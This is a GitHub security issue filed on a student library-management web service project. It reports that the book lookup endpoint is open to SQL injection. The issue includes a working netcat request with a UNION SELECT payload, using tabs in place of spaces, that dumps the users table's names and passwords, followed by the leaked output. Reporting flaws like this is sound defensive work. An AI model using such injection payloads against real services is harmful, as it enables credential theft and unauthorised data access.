search

dazzling-sky / COMP4111-project

COMP4111 project - RESTful Web Service for Library Book Management
https://course.cse.ust.hk/comp4111/project.html
0 stars 0 forks source link

[Security] Dumping user password database with SQL injection in book lookup #30

Open STommydx opened 4 years ago

STommydx commented 4 years ago

Describe the bug User passwords can be dumped through SQL injection in book lookup

To Reproduce

  1. Login as usual
  2. Send the following request with netcat in terminal. 
    echo -e "GET /BookManagementService/books?token=kzm6314&title=\"\tUNION\tSELECT\t0,Name,Password,0,0,0\tFROM\tusers\tWHERE\tName\tLIKE\" HTTP/1.1\r\n" | nc localhost 8080

    Change kzm6314 to your login token.

Expected behavior 204 No Content

What actually happens 200 OK returning the username and passwords as Author and Publisher respectively

{
    "FoundBooks": 10000,
    "Results": [
        {
            "Title": "user00001",
            "Author": "pass00001",
            "Publisher": "0",
            "Year": 0
        },
        {
            "Title": "user00002",
            "Author": "pass00002",
            "Publisher": "0",
            "Year": 0
        },
        "(many more lines truncated....)"
    ]
}